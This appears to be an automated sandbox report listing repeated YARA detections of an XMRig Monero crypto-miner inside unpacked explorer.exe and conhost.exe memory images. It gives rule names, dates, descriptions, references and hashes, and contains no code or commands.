Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
